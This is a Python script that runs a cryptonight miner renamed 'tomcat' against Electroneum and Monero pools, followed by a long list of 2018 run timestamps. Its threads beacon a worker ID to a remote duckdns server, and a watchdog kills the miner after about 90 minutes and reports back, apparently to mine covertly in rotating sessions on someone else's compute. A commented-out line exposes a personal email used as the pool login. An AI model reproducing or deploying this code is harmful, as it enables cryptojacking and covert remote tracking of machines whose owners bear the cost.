import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:16:03.586031
#2018-02-17 17:05:02.911162
#2018-02-17 18:52:07.693792
#2018-02-17 20:39:03.443882
#2018-02-17 22:26:03.866968
#2018-02-18 00:09:07.369081
#2018-02-18 01:59:06.906139
#2018-02-18 03:46:06.547038
#2018-02-18 05:34:07.590339
#2018-02-18 07:27:07.128300
#2018-02-18 09:14:06.259476
#2018-02-18 11:01:05.265515
#2018-02-18 12:47:07.359192
#2018-02-18 14:33:01.685660
#2018-02-18 16:23:06.794434
#2018-02-18 18:13:01.784944
#2018-02-18 19:58:03.834506
#2018-02-18 21:45:08.707039
#2018-02-18 23:34:06.146699
#2018-02-19 01:20:06.216130
#2018-02-19 03:08:05.439753
#2018-02-19 04:53:03.958333
#2018-02-19 06:39:07.063784
#2018-02-19 08:29:06.321447
#2018-02-19 10:18:07.236182
#2018-02-19 12:06:01.832159
#2018-02-19 13:54:07.774088
#2018-02-19 15:42:07.969383
#2018-02-19 17:31:06.373154
#2018-02-19 19:19:06.898782
#2018-02-19 21:06:05.677491
#2018-02-19 22:53:04.009787
#2018-02-20 00:39:07.027231
#2018-02-20 02:29:07.268104
#2018-02-20 04:19:05.366778
#2018-02-20 06:03:01.456957
#2018-02-20 07:47:06.392198
#2018-02-20 09:32:08.124027
#2018-02-20 11:16:08.084315
#2018-02-20 13:04:07.910011
#2018-02-20 14:47:01.521838
#2018-02-20 16:34:05.552211
#2018-02-20 18:22:01.962976
#2018-02-20 20:12:09.514392
#2018-02-20 22:00:01.732667
#2018-02-20 23:40:07.147595
#2018-02-21 01:24:01.405020
#2018-02-21 03:58:03.863027
#2018-02-21 05:47:04.859149
#2018-02-21 07:35:02.956066
#2018-02-21 09:19:08.088330
#2018-02-21 11:08:08.359390
#2018-02-21 12:55:07.893995
#2018-02-21 14:42:09.465430
#2018-02-21 16:29:01.764016
#2018-02-21 18:20:04.536163
#2018-02-21 20:05:01.661113
#2018-02-21 21:52:03.110644
#2018-02-21 23:38:05.054716
#2018-02-22 01:27:04.786037
#2018-02-22 03:15:07.497134
#2018-02-22 05:03:06.584164
#2018-02-22 06:46:06.800925
#2018-02-22 08:45:07.476775
#2018-02-22 10:32:04.814378
#2018-02-22 12:18:05.259295
#2018-02-22 14:04:04.130095
#2018-02-22 15:52:06.978607
#2018-02-22 17:39:04.626109
#2018-02-22 19:25:10.668673
#2018-02-22 21:16:05.386159
#2018-02-22 23:03:03.682195
#2018-02-23 00:48:04.161943
#2018-02-23 02:35:08.710324
#2018-02-23 04:24:01.538032
#2018-02-23 06:09:06.389133
#2018-02-23 07:54:07.333540
#2018-02-23 10:11:01.761902
#2018-02-23 12:04:08.558060
#2018-02-23 13:53:08.610404
#2018-02-23 15:44:09.868386
#2018-02-23 17:30:01.556247
#2018-02-23 19:16:05.126114
#2018-02-23 20:59:06.640414
#2018-02-23 22:45:09.552960
#2018-02-24 00:33:02.197887
#2018-02-24 02:23:07.745796
#2018-02-24 04:14:02.126909
#2018-02-24 06:02:06.623620
#2018-02-24 07:49:04.881044
#2018-02-24 09:34:05.024163
#2018-02-24 11:27:07.611507
#2018-02-24 13:16:04.061931
#2018-02-24 15:07:01.757628
#2018-02-24 16:55:07.278324
#2018-02-24 18:43:05.359163
#2018-02-24 20:34:06.087955
#2018-02-24 22:37:03.705780
#2018-02-25 02:50:07.472885
#2018-02-25 05:31:07.958229
#2018-02-25 08:09:07.382765
#2018-02-25 11:41:01.220949
#2018-02-25 14:16:01.813366
#2018-02-25 15:51:02.028725